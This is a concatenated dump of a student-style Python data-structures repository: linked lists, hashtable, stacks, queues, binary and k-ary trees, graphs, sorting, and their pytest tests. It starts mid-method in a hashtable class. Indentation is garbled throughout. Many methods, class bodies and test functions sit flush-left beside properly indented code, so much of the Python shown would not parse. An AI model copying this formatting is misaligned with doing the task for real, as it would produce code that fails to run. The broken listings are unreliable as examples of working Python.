self._bucket[index] = LinkedList()
self._bucket[index].append_item([key,value])
    def get(self, key):
        index = self.hash(key)
        bucket = self._bucket[index]
        if not bucket:
            raise KeyError("Key not found", key)
        current = bucket.head
        while current:
            if current.data[0] == key:
                return current.data[1]
            current = current.next
        raise KeyError("Key not found", key)
def contains(self, key):
index = self.hash(key)
bucket = self._bucket[index]
if bucket is None:
return False
current = bucket.head
while current:
if current.data[0] == key:
return True
current = current.next
        return False
    def hash(self, key):
        # Additive hash: sum the character ordinals, scale by a prime,
        # then mod by the bucket count to get an in-range index.
        total = 0
        for char in key:
            total += ord(char)
        total *= 599
        return total % len(self._bucket)
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/breadth_first/breadth_first.py | <reponame>everydaytimmy/data-structures-and-algorithms<filename>python/code_challenges/breadth_first/breadth_first.py<gh_stars>0
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
class BinaryTree:
def __init__(self):
self.root = None
    def add(self, value):
        # Breadth-first insertion: place the new node in the first empty
        # child slot found in level order, keeping the tree compact.
        if not self.root:
            self.root = Node(value)
            return
        queue = Queue()
        queue.enqueue(self.root)
        while not queue.is_empty():
            node = queue.dequeue()
            if not node.left:
                node.left = Node(value)
                return
            if not node.right:
                node.right = Node(value)
                return
            queue.enqueue(node.left)
            queue.enqueue(node.right)
@staticmethod
    def breadth(tree=None):
        # Level-order traversal: visit each node left to right, level by level.
        if not tree or not tree.root:
            return []
        values = []
        queue = Queue()
        queue.enqueue(tree.root)
        while not queue.is_empty():
            node = queue.dequeue()
            values.append(node.value)
            if node.left:
                queue.enqueue(node.left)
            if node.right:
                queue.enqueue(node.right)
        return values
class Queue:
def __init__ (self):
self.front = None
self.rear = None
    def enqueue(self, value):
        if self.front is None:
            self.front = self.rear = QNode(value)
        else:
            self.rear.next = QNode(value)
            self.rear = self.rear.next
def dequeue(self):
if self.front is None:
return
ret = self.front.value
self.front = self.front.next
return ret
def is_empty(self):
return self.front is None
def peek(self):
if self.front:
return self.front.value
class QNode:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_quick_sort.py | from code_challenges.quick_sort.quick_sort import partition, quick_sort
def test_quick():
assert quick_sort
def test_quick_sort():
array = [ 10, 7, 8, 9, 1, 5 ]
actual = quick_sort(0, len(array) - 1, array)
expected = [1,5,7,8,9,10]
assert actual == expected
def test_quick1():
array = [8,4,23,42,16,15]
actual = quick_sort(0, len(array) - 1, array)
expected = [4,8,15,16,23,42]
assert actual == expected
def test_quick2():
array = [3,4,12,42,-8,15]
actual = quick_sort(0, len(array) - 1, array)
expected = [-8,3,4,12,15,42]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_multi-bracket-validation.py | <gh_stars>0
from code_challenges.multi_bracket_validation.multi_bracket_validation import (multi_bracket_validation)
def test_one():
string = "{}{Code}[Fellows](())"
actual = multi_bracket_validation(string)
expected = True
assert actual == expected
def test_two():
string = "{{}}}}"
actual = multi_bracket_validation(string)
expected = False
assert actual == expected
def test_three():
string = "(){}[]"
actual = multi_bracket_validation(string)
expected = True
assert actual == expected
def test_four():
string = "{"
actual = multi_bracket_validation(string)
expected = False
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_hashtable.py | from code_challenges.hashtable.hashtable import Hashtable
def test_exists():
assert Hashtable
def test_add():
ht = Hashtable()
actual = ht.add('rum ham', 11)
expected = None
assert actual == expected
def test_get_value():
ht = Hashtable()
ht.add('rum ham', 6)
actual = ht.get('rum ham')
expected = 6
assert actual == expected
def test_hash():
ht = Hashtable()
actual = ht.hash('rum ham')
    assert 0 <= actual < 1024
def test_contains():
ht = Hashtable()
ht.add('rum ham', 6)
actual = ht.contains('toe knife')
expected = False
assert actual == expected
# def test_collision():
# ht = Hashtable()
# ht.add('rum ham', 6)
# ht.add('toe knife', 6)
# one = ht.get('rum ham')
# two = ht.get('toe knife')
# assert one != two
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/merge_sort/merge_sort.py | def merge_sort(items):
    # Recursively split, sort each half, then merge back into `items` in place.
    n = len(items)
    if n <= 1:
        return items
    mid = n // 2
    left = items[0:mid]
    right = items[mid:n]
    merge_sort(left)
    merge_sort(right)
    return merge(left, right, items)
def merge(left, right, items):
    i = 0
    j = 0
    k = 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            items[k] = left[i]
            i = i + 1
        else:
            items[k] = right[j]
            j = j + 1
        k = k + 1
    if i == len(left):
        items[k:] = right[j:]
    else:
        items[k:] = left[i:]
    return items
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_breadth_first_graph.py | <filename>python/tests/test_breadth_first_graph.py<gh_stars>0
from code_challenges.depth_first_graph.depth_first_graph import depth_traversal, Stack, Node
from code_challenges.graph.graph import Graph, Vertex
def test_depth_traversal_exists():
assert depth_traversal
def test_depth_traversal_one():
graph = Graph()
boston = graph.add_node('Boston')
seattle = graph.add_node('Seattle')
la = graph.add_node('LA')
sf = graph.add_node('SF')
chi = graph.add_node('CHI')
ny = graph.add_node('NY')
graph.add_edge(boston, ny, 82)
graph.add_edge(boston, chi, 90)
graph.add_edge(ny, chi, 42)
graph.add_edge(ny, seattle, 200)
graph.add_edge(ny, la, 225)
graph.add_edge(ny, sf, 230)
graph.add_edge(chi, seattle, 175)
graph.add_edge(seattle, sf, 85)
graph.add_edge(sf, la, 85)
actual = depth_traversal(boston, graph)
expected = [boston, chi, seattle, sf, la, ny]
assert actual == expected
def test_depth_traversal_two():
graph = Graph()
city = graph.add_node('Boston')
town = graph.add_node('Seattle')
place = graph.add_node('LA')
graph.add_edge(city, town, 82)
graph.add_edge(town, place, 90)
graph.add_edge(city, place, 42)
actual = depth_traversal(city, graph)
expected = [city, place, town]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_hashmap_left_join.py | <reponame>everydaytimmy/data-structures-and-algorithms<gh_stars>0
from code_challenges.hashmap_left_join.hashmap_left_join import hashmap_left_join
from code_challenges.hashtable.hashtable import Hashtable
def test_exists():
assert hashmap_left_join
def test_left_join():
ht1 = Hashtable()
ht2 = Hashtable()
ht1.add('fond', 'enamored')
ht1.add('wrath', 'anger')
ht1.add('diligent', 'employed')
ht2.add('fond', 'averse')
ht2.add('wrath', 'delight')
ht2.add('happy', 'follow')
actual = hashmap_left_join(ht1, ht2)
expected = [
['fond', 'enamored', 'averse'],
['wrath', 'anger', 'delight'],
['diligent', 'employed', None]
]
for entry in expected:
assert entry in actual
def test_left_join_one_empty():
ht1 = Hashtable()
ht2 = Hashtable()
ht1.add('fond', 'enamored')
ht1.add('wrath', 'anger')
actual = hashmap_left_join(ht1, ht2)
expected = [
['fond', 'enamored', None],
['wrath', 'anger', None],
]
for entry in expected:
assert entry in actual
def test_left_join_both_empty():
ht1 = Hashtable()
ht2 = Hashtable()
actual = hashmap_left_join(ht1, ht2)
expected = []
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_hash_repeat.py | <gh_stars>0
from code_challenges.hashmap_repeated.hashmap_repeated import word_repeat
from code_challenges.hashtable.hashtable import Hashtable
def test_word_repeat():
assert word_repeat
def test_string():
actual = word_repeat("Once upon a time, there was a brave princess who...")
expected = 'a'
assert actual == expected
def test_string_1():
actual = word_repeat("It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair, we had everything before us, we had nothing before us, we were all going direct to Heaven, we were all going direct the other way – in short, the period was so far like the present period, that some of its noisiest authorities insisted on its being received, for good or for evil, in the superlative degree of comparison only...")
expected = 'it'
assert actual == expected
def test_string_2():
actual = word_repeat("It was a queer, sultry summer, the summer they electrocuted the Rosenbergs, and I didn’t know what I was doing in New York...")
expected = 'summer'
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/queueWithStacks/queueWithStacks.py | class Stack:
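    # A FIFO queue built on a single linked-list stack: enqueue pushes onto the
    # top; dequeue reverses the chain so the oldest node can be popped.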
def __init__(self):
self.top = None
def push(self, value):
self.top = Node (value, self.top)
def pop(self):
value = self.top.value
self.top = self.top.next
return value
def enqueue(self, value):
self.top = Node (value, self.top)
def dequeue(self):
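        # Reverse the list in place so the oldest element sits on top, then pop it.
        # Note the list is left front-first afterwards.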
prev = None
current = self.top
while(current is not None):
next = current.next
current.next = prev
prev = current
current = next
self.top = prev
value = self.top.value
self.top = self.top.next
return value
class Node:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_linked_list.py | <reponame>everydaytimmy/data-structures-and-algorithms
from code_challenges.linked_list.linked_list import LinkedList, Node
def test_import():
assert LinkedList
def test_insert():
list = LinkedList(Node("Buddy"))
assert list.head.data == "Buddy"
list.insert('Guy')
list.insert('Friend')
assert list.head.data == 'Friend'
def test_append_end():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
actual = list.head.data
expected = "rock"
assert actual == expected
def test_includes():
list = LinkedList()
list.insert('rubber')
list.insert('baby')
list.insert('buggy')
list.insert('bumpers')
actual = list.includes('baby')
expected = True
assert actual == expected
def test_not_includes():
list = LinkedList()
list.insert('rubber')
list.insert('baby')
list.insert('buggy')
list.insert('bumpers')
actual = list.includes('rad')
expected = False
assert actual == expected
def test_head():
node = Node('rubber')
actual = node.next
expected = None
assert actual == expected
def test_to_string():
list = LinkedList()
list.insert("c")
list.insert("b")
list.insert("a")
actual = list.__str__()
expected = "{ a } -> { b } -> { c } -> None"
assert actual == expected
def test_values():
list = LinkedList()
list.insert('bumpers')
list.insert('buggy')
list.insert('baby')
list.insert('rubber')
actual = list.find_all()
expected = ['rubber', 'baby', 'buggy', 'bumpers']
assert actual == expected
def test_add_before_value():
list = LinkedList()
list.insert('bumpers')
list.insert('buggy')
list.insert('rubber')
list.inject_b('buggy', 'baby')
actual = list.find_all()
expected = ['rubber', 'baby', 'buggy', 'bumpers']
assert actual == expected
def test_add_after_value():
list = LinkedList()
list.insert('bumpers')
list.insert('baby')
list.insert('rubber')
list.inject_a('baby', 'buggy')
actual = list.find_all()
expected = ['rubber', 'baby', 'buggy', 'bumpers']
assert actual == expected
def test_add_after_value1():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
list.inject_a('scissors', 'cannon')
actual = list.find_all()
expected = ['rock', 'paper', 'scissors', 'cannon', 'machinegun']
assert actual == expected
def test_x_fromend():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
actual = list.x_fromend(2)
expected = 'paper'
assert actual == expected
def test_x_fromend10():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
actual = list.x_fromend(10)
expected = 'Exception'
assert actual == expected
def test_x_fromend0():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
actual = list.x_fromend(0)
expected = 'machinegun'
assert actual == expected
def test_x_fromend_one_item():
list = LinkedList()
list.append_item('machinegun')
actual = list.x_fromend(0)
expected = 'machinegun'
assert actual == expected
def test_x_fromend_neg():
list = LinkedList()
list.append_item('machinegun')
actual = list.x_fromend(-2)
expected = 'Exception'
assert actual == expected
def test_zip():
lista = LinkedList()
listb = LinkedList()
lista.append_item('A')
lista.append_item('B')
listb.append_item('1')
listb.append_item('2')
answer = lista.zip_list(listb)
actual = answer.find_all()
expected = ['A', '1', 'B', '2']
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/stacks_and_queues/stacks_and_queues.py | <gh_stars>0
from code_challenges.stacks_and_queues.invalid_error import InvalidOperationError
class Stack:
def __init__(self):
self.top = None
def push(self, value):
self.top = Node (value, self.top)
def pop(self):
if not self.top:
raise InvalidOperationError("Method not allowed on empty collection")
value = self.top.value
self.top = self.top.next
return value
def is_empty(self):
return self.top is None
def peek(self):
if not self.top:
raise InvalidOperationError("Method not allowed on empty collection")
return self.top.value
class Queue:
def __init__ (self):
self.front = None
self.rear = None
def enqueue(self, value):
if self.rear:
self.rear.next = Node(value)
self.rear = self.rear.next
else:
self.rear = Node(value)
self.front = self.rear
    def dequeue(self):
        if not self.front:
            raise InvalidOperationError("Method not allowed on empty collection")
        old_front = self.front
        self.front = self.front.next
        old_front.next = None
        if self.front is None:
            # The queue is now empty; clear rear so the next enqueue rebuilds it.
            self.rear = None
        return old_front.value
def is_empty(self):
return self.front is None
    def peek(self):
        # Peek at the front of the queue: the next value dequeue would return.
        if not self.front:
            raise InvalidOperationError("Method not allowed on empty collection")
        return self.front.value
class Node:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/graph/graph.py | <reponame>everydaytimmy/data-structures-and-algorithms
class Vertex:
def __init__(self, value):
self.value = value
class Graph:
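    # Adjacency-list graph: maps each Vertex to a dict of {neighbor: weight}.
    # A graph created with kind='bidirectional' mirrors every edge both ways.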
def __init__(self, kind='single direction'):
self.adjacency_list = {}
self.type= kind
    def add_node(self, value):
        # Each call creates a distinct Vertex object, so a fresh adjacency
        # entry is always added.
        vertex = Vertex(value)
        self.adjacency_list[vertex] = {}
        return vertex
def get_nodes(self):
return tuple(self.adjacency_list.keys())
    def size(self):
        return len(self.adjacency_list)
def add_edge(self, start_vertex, end_vertex, weight=0):
if start_vertex not in self.adjacency_list:
raise KeyError("Start Vertex not found in graph")
if end_vertex not in self.adjacency_list:
raise KeyError("End Vertex not found in graph")
self.adjacency_list[start_vertex][end_vertex] = weight
if self.type == 'bidirectional':
self.adjacency_list[end_vertex][start_vertex] = weight
def get_neighbors(self, vertex):
return self.adjacency_list[vertex]
# def add_edge(self, start_vertex, end_vertex, weight=0):
# edge = Edge(end_vertex, weight)
# self.adjacency_list[start_vertex].append(edge)
# class Edge:
# def __init__(self, vertex, weight):
# self.vertex = vertex
# self.weight = weight
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashmap_left_join/hashmap_left_join.py | <reponame>everydaytimmy/data-structures-and-algorithms
from code_challenges.hashtable.hashtable import Hashtable
def hashmap_left_join(ht1, ht2):
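    # LEFT JOIN: every key in ht1 yields [key, ht1_value, ht2_value],
    # with None in the last slot when ht2 lacks the key.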
answer = []
for bucket in ht1._bucket:
if bucket:
current = bucket.head
while current:
current_key = current.data[0]
current_value = current.data[1]
pairs = [current_key, current_value]
if ht2.contains(current_key):
pairs.append(ht2.get(current_key))
else:
pairs.append(None)
answer.append(pairs)
current = current.next
return answer
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/linked_list/linked_list.py | <filename>python/code_challenges/linked_list/linked_list.py
class LinkedList:
def __init__(self, head=None):
self.head = head
def __iter__(self):
def value_generator():
current = self.head
while current:
                yield current.data
                current = current.next
return value_generator()
def __len__(self):
return len(list(iter(self)))
def __eq__(self, other):
return list(self) == list(other)
def insert(self, data):
self.head = Node(data, self.head)
def append_item(self, data):
new_node = Node(data)
current = self.head
if not self.head:
self.head = new_node
return
while current.next:
current = current.next
current.next = new_node
def includes(self, data):
current = self.head
while current:
if current.data == data:
return True
current = current.next
return False
def find_all(self):
values = []
current = self.head
while current:
values.append(current.data)
current = current.next
return values
def __str__(self):
string = ""
current = self.head
while current:
string += "{ " + current.data + " } -> "
current = current.next
string += 'None'
return string
    def inject_b(self, index, value):
        # Insert `value` immediately before the first node whose data equals `index`.
        if self.head and self.head.data == index:
            self.head = Node(value, self.head)
            return
        current = self.head
        while current and current.next:
            if current.next.data == index:
                current.next = Node(value, current.next)
                return
            current = current.next
def inject_a(self, index, value):
current = self.head
while current:
if current.data == index:
current.next = Node(value, current.next)
break
else:
current = current.next
    def x_fromend(self, index):
        # Collect all values, reverse so position 0 is the tail, then index
        # from the end; out-of-range indexes report 'Exception'.
        temp = []
        current = self.head
        while current:
            temp.append(current.data)
            current = current.next
        temp = temp[::-1]
        if index < 0 or index >= len(temp):
            return 'Exception'
        return temp[index]
    def zip_list(lista, listb):
        # Weave listb's nodes into lista, alternating elements; leftover nodes
        # from the longer list keep their original order at the tail.
        current_a = lista.head
        current_b = listb.head
        while current_a and current_b:
            old_next_a = current_a.next
            old_next_b = current_b.next
            current_a.next = current_b
            if old_next_a is not None:
                current_b.next = old_next_a
            current_a = old_next_a
            current_b = old_next_b
        return lista
class Node:
def __init__(self, data, next=None):
self.data = data
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_tree.py | <filename>python/tests/test_tree.py
import pytest
from code_challenges.tree.tree import Node, BinaryTree, BinarySearchTree
def test_node_has_value():
node = Node("apple")
assert node.value == "apple"
def test_node_has_left_of_none():
node = Node("apple")
assert node.left is None
def test_node_has_right_of_none():
node = Node("apple")
assert node.right is None
def test_create_binary_tree():
tree = BinaryTree()
assert tree
def test_binary_tree_has_root():
tree = BinaryTree()
assert tree.root is None
def test_create_binary_search_tree():
tree = BinarySearchTree()
assert tree
def test_binary_search_tree_has_root():
tree = BinarySearchTree()
assert tree.root is None
def test_add_to_empty_bst():
tree = BinarySearchTree()
tree.add(5)
actual = tree.root.value
expected = 5
assert actual == expected
def test_add_to_empty_bst_again():
tree = BinarySearchTree()
tree.add(7)
actual = tree.root.value
expected = 7
assert actual == expected
def test_add_lesser_to_not_empty_bst():
tree = BinarySearchTree()
tree.add(5)
tree.add(2)
actual = tree.root.left.value
expected = 2
assert actual == expected
def test_add_greater_to_not_empty_bst():
tree = BinarySearchTree()
tree.add(5)
tree.add(7)
actual = tree.root.right.value
expected = 7
assert actual == expected
def test_add_lesser_then_in_between():
tree = BinarySearchTree()
tree.add(5)
tree.add(2)
tree.add(3)
actual = tree.root.left.right.value
expected = 3
assert actual == expected
def test_add_greater_then_in_between():
tree = BinarySearchTree()
tree.add(5)
tree.add(10)
tree.add(7)
actual = tree.root.right.left.value
expected = 7
assert actual == expected
def test_bst_contains():
tree = BinarySearchTree()
tree.add(5)
tree.add(10)
tree.add(6)
tree.add(7)
actual = tree.contains(7)
expected = True
assert actual == expected
def test_pre_order():
tree = BinarySearchTree()
tree.add(50)
tree.add(25)
tree.add(75)
tree.add(20)
tree.add(80)
tree.add(40)
"""
50
25 75
20 40 80
"""
actual = tree.pre_order()
expected = [50, 25, 20, 40, 75, 80]
assert actual == expected
def test_in_order():
tree = BinarySearchTree()
tree.add(50)
tree.add(25)
tree.add(75)
tree.add(20)
tree.add(80)
tree.add(40)
"""
50
25 75
20 40 80
"""
actual = tree.in_order()
expected = [20, 25, 40, 50, 75, 80]
assert actual == expected
def test_post_order():
tree = BinarySearchTree()
tree.add(50)
tree.add(25)
tree.add(75)
tree.add(20)
tree.add(80)
tree.add(40)
"""
50
25 75
20 40 80
"""
actual = tree.post_order()
expected = [20, 40, 25, 80, 75, 50]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/multi_bracket_validation/multi_bracket_validation.py | <gh_stars>0
def multi_bracket_validation(input):
    # Track an open-bracket count per bracket type; a count going negative
    # means a closer appeared before its opener.
    curly = 0
    square = 0
    parens = 0
    for char in input:
        if char == "{":
            curly += 1
        if char == "}":
            curly -= 1
        if curly < 0:
            return False
        if char == "[":
            square += 1
        if char == "]":
            square -= 1
        if square < 0:
            return False
        if char == "(":
            parens += 1
        if char == ")":
            parens -= 1
        if parens < 0:
            return False
    return curly == 0 and square == 0 and parens == 0
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_insertion_sort.py | <filename>python/tests/test_insertion_sort.py
from code_challenges.insertion_sort.insertion_sort import insertion_sort
def test_insertion_sort_one():
    actual = insertion_sort([1, 6, 3, 8, 66, 23])
    expected = [1, 3, 6, 8, 23, 66]
    assert actual == expected
def test_insertion_sorting1():
actual = insertion_sort([20, 18, 12, 8, 5, -2])
expected = [-2, 5, 8, 12, 18, 20]
assert actual == expected
def test_insertion_sorting2():
actual = insertion_sort([5, 12, 7, 5, 5, 7])
expected = [5, 5, 5, 7, 7, 12]
assert actual == expected
def test_insertion_sorting3():
actual = insertion_sort([2, 3, 5, 7, 13, 11])
expected = [2, 3, 5, 7, 11, 13]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/fifo_animal_shelter/fifo_animal_shelter.py | <reponame>everydaytimmy/data-structures-and-algorithms<filename>python/code_challenges/fifo_animal_shelter/fifo_animal_shelter.py
from collections import deque
class Queue(deque):
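    # Thin adapter that exposes queue verbs on top of collections.deque.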
def enqueue(self, value):
self.append(value)
def dequeue(self):
return self.popleft()
def is_empty(self):
return len(self) == 0
    def peek(self):
        # Return the front item without removing it; None when empty.
        return self[0] if self else None
class AnimalShelter:
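    # Keeps a FIFO queue per species so the longest-waiting animal of the
    # preferred kind is adopted first.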
def __init__(self):
self.cats = Queue()
self.dogs = Queue()
def enqueue(self, animal):
if isinstance(animal, Dog):
self.dogs.enqueue(animal)
else:
self.cats.enqueue(animal)
def dequeue(self, pref):
if pref == "dog" and self.dogs:
return self.dogs.dequeue()
if pref == "cat" and self.cats:
return self.cats.dequeue()
return None
class Cat:
pass
class Dog:
pass
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/fizzbuzz_tree/fizzbuzz_tree.py |
class Node:
def __init__(self, value):
self.value = value
self.children = []
class Ktree():
def __init__(self):
self.root = None
@staticmethod
    def breadth(tree=None):
        # Level-order traversal of a k-ary tree; visits every child of each node.
        if not tree or not tree.root:
            return []
        values = []
        queue = Queue()
        queue.enqueue(tree.root)
        while not queue.is_empty():
            node = queue.dequeue()
            values.append(node.value)
            for child in node.children:
                queue.enqueue(child)
        return values
def fizz_buzz(tree):
    # Build a new Ktree of the same shape whose values are fizzified copies.
    new_tree = Ktree()
    if not tree or not tree.root:
        return new_tree
    new_tree.root = Node(fizzify(tree.root.value))
    queue = Queue()
    queue.enqueue((tree.root, new_tree.root))
    while not queue.is_empty():
        node, new_node = queue.dequeue()
        for child in node.children:
            new_child = Node(fizzify(child.value))
            new_node.children.append(new_child)
            queue.enqueue((child, new_child))
    return new_tree
def fizzify(value):
    if value % 3 == 0 and value % 5 == 0:
        return "fizzbuzz"
    if value % 3 == 0:
        return "fizz"
    if value % 5 == 0:
        return "buzz"
    return str(value)
class Queue:
def __init__ (self):
self.front = None
self.rear = None
    def enqueue(self, value):
        if self.front is None:
            self.front = self.rear = QNode(value)
        else:
            self.rear.next = QNode(value)
            self.rear = self.rear.next
def dequeue(self):
if self.front is None:
return
ret = self.front.value
self.front = self.front.next
return ret
def is_empty(self):
return self.front is None
def peek(self):
if self.front:
return self.front.value
class QNode:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashmap_tree_intersection/hashmap_tree_intersection.py | from code_challenges.tree.tree import BinarySearchTree
def tree_intersection(tree1, tree2):
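    # Pre-order walk of tree1, keeping every value that tree2 also contains.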
    list1 = tree1.pre_order()
answer_key = []
for i in list1:
if tree2.contains(i):
answer_key.append(i)
return answer_key
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_queue_stack.py | from code_challenges.queueWithStacks.queueWithStacks import Stack, Node
def test_is_stack():
assert Stack()
def test_pop():
stack = Stack()
stack.enqueue('Dwight')
stack.enqueue('Michael')
stack.enqueue('Pam')
stack.enqueue('Jim')
stack.enqueue('Andy')
stack.dequeue()
actual = stack.top.value
expected = 'Michael'
assert actual == expected
def test_pop1():
stack = Stack()
stack.enqueue('Dwight')
stack.enqueue('Michael')
stack.enqueue('Pam')
stack.enqueue('Jim')
stack.enqueue('Andy')
stack.enqueue('Creed')
stack.dequeue()
actual = stack.top.value
expected = 'Michael'
assert actual == expected
def test_push():
stack = Stack()
stack.enqueue('Dwight')
actual = stack.top.value
expected = 'Dwight'
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_graphs.py | from code_challenges.graph.graph import Graph, Vertex
def test_add_node():
graph = Graph()
expected_value = 'noodle'
actual = graph.add_node('noodle')
assert actual.value == expected_value
def test_get_nodes():
graph = Graph()
graph.add_node("pizza")
actual = graph.get_nodes()
expected = 1
assert len(actual) == expected
assert isinstance(actual[0], Vertex)
assert actual[0].value == "pizza"
def test_size_graph():
graph = Graph()
graph.add_node("horse")
graph.add_node("lamb")
actual = graph.size()
expected = 2
assert actual == expected
# def test_get_neighbors():
# graph = Graph()
# vertex1 = graph.add_node('Chicken')
# vertex2 = graph.add_node('Egg')
# graph.add_edge(vertex1, vertex2, 5)
# neighbors = graph.get_neighbors(vertex1)
# assert len(neighbors) == 1
# single_edge = neighbors[0]
# assert single_edge.vertex.value == 'Egg'
# assert single_edge.weight == 5
def test_get_neighbors():
graph = Graph()
eggs = graph.add_node('eggs')
chicken = graph.add_node('chicken')
graph.add_edge(eggs, chicken, 10)
neighbors = graph.get_neighbors(eggs)
assert chicken in neighbors
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/graph_business_trip/graph_business_trip.py | from code_challenges.graph.graph import Graph, Vertex
def business_trip(graph, arr_cities):
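    # Walk consecutive city pairs, summing edge weights; any missing direct
    # edge makes the whole trip impossible.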
if not graph.adjacency_list:
return False, 0
cost = 0
    for i, city in enumerate(arr_cities):
        if i + 1 >= len(arr_cities):
            return True, cost
        neighbors = graph.get_neighbors(city)
        if arr_cities[i + 1] in neighbors:
            cost += neighbors[arr_cities[i + 1]]
            continue
        return False, 0
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_max_binary_tree.py | from code_challenges.find_maximum_binary_tree.find_maximum_binary_tree import Node, BinaryTree, BinarySearchTree
def test_node_has_value():
node = Node("apple")
assert node.value == "apple"
def test_create_binary_tree():
tree = BinaryTree()
assert tree
def test_max_value():
tree = BinarySearchTree()
tree.add(5)
tree.add(20)
tree.add(3)
tree.add(45)
tree.add(50)
tree.add(-1)
actual = tree.max()
expected = 50
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/tree/tree.py | class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
class BinaryTree:
def __init__(self):
self.root = None
class BinarySearchTree(BinaryTree):
def add(self, value):
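        # Recursive descent: values smaller than the current node go left,
        # everything else goes right, attaching at the first empty slot.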
node = Node(value)
def walk(root, new_node):
if not root:
return
new_value = new_node.value
if new_value < root.value:
if root.left:
walk(root.left, new_node)
else:
root.left = new_node
else:
if root.right:
walk(root.right, new_node)
else:
root.right = new_node
if not self.root:
self.root = node
return
walk(self.root, node)
def contains(self, value):
def walk(root, value):
if not root:
return False
return (root.value == value or walk(root.left, value) or walk(root.right, value))
return walk(self.root, value)
def pre_order(self):
def walk(root, collection):
if not root:
return
collection.append(root.value)
walk(root.left, collection)
walk(root.right, collection)
collected_values = []
walk(self.root, collected_values)
return collected_values
def in_order(self):
def walk(root, collection):
if not root:
return
walk(root.left, collection)
collection.append(root.value)
walk(root.right, collection)
collected_values = []
walk(self.root, collected_values)
return collected_values
def post_order(self):
def walk(root, collection):
if not root:
return
walk(root.left, collection)
walk(root.right, collection)
collection.append(root.value)
collected_values = []
walk(self.root, collected_values)
return collected_values
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_stacks_queues.py | <reponame>everydaytimmy/data-structures-and-algorithms
import pytest
from code_challenges.stacks_and_queues.stacks_and_queues import Stack, Queue, Node
from code_challenges.stacks_and_queues.invalid_error import InvalidOperationError
def test_is_stack():
assert Stack()
def test_push():
stack = Stack()
stack.push('Dwight')
actual = stack.top.value
expected = 'Dwight'
assert actual == expected
def test_push_many():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
actual = stack.top.value
expected = 'Jim'
assert actual == expected
def test_pop():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.pop()
actual = stack.top.value
expected = 'Michael'
assert actual == expected
def test_pop_till_empty():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.pop()
stack.pop()
stack.pop()
actual = stack.is_empty()
expected = True
assert actual == expected
def test_peek_does_not_pop():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.push('Andy')
stack.peek()
actual = stack.top.next.value
expected = 'Jim'
assert actual == expected
def test_peek():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.push('Andy')
stack.peek()
actual = stack.top.value
expected = 'Andy'
assert actual == expected
def test_empty_stack():
stack = Stack()
assert stack.is_empty()
def test_pop_on_empty():
new_stack = Stack()
with pytest.raises(InvalidOperationError) as e:
new_stack.pop()
assert str(e.value) == "Method not allowed on empty collection"
def test_peek_on_empty():
new_stack = Stack()
with pytest.raises(InvalidOperationError) as e:
new_stack.peek()
def test_enqueue():
queue = Queue()
queue.enqueue('Ron')
actual = queue.rear.value
expected = 'Ron'
assert actual == expected
def test_enqueue_multiple():
queue = Queue()
queue.enqueue('Ron')
queue.enqueue('Andy')
queue.enqueue('Leslie')
actual = queue.rear.value
expected = 'Leslie'
assert actual == expected
def test_dequeue():
queue = Queue()
queue.enqueue('Dennis')
queue.enqueue('Mac')
queue.enqueue('Charlie')
queue.enqueue('Dee')
queue.dequeue()
actual = queue.front.value
expected = 'Mac'
assert actual == expected
def test_dequeue_empty():
queue = Queue()
queue.enqueue('Dennis')
queue.enqueue('Mac')
queue.enqueue('Charlie')
queue.enqueue('Dee')
queue.dequeue()
queue.dequeue()
queue.dequeue()
queue.dequeue()
actual = queue.is_empty()
expected = True
assert actual == expected
def test_new_queue():
queue = Queue()
actual = queue.is_empty()
expected = True
assert actual == expected
def test_call_dequeue_on_empty_queue():
new_queue = Queue()
with pytest.raises(InvalidOperationError) as e:
new_queue.dequeue()
assert str(e.value) == "Method not allowed on empty collection"
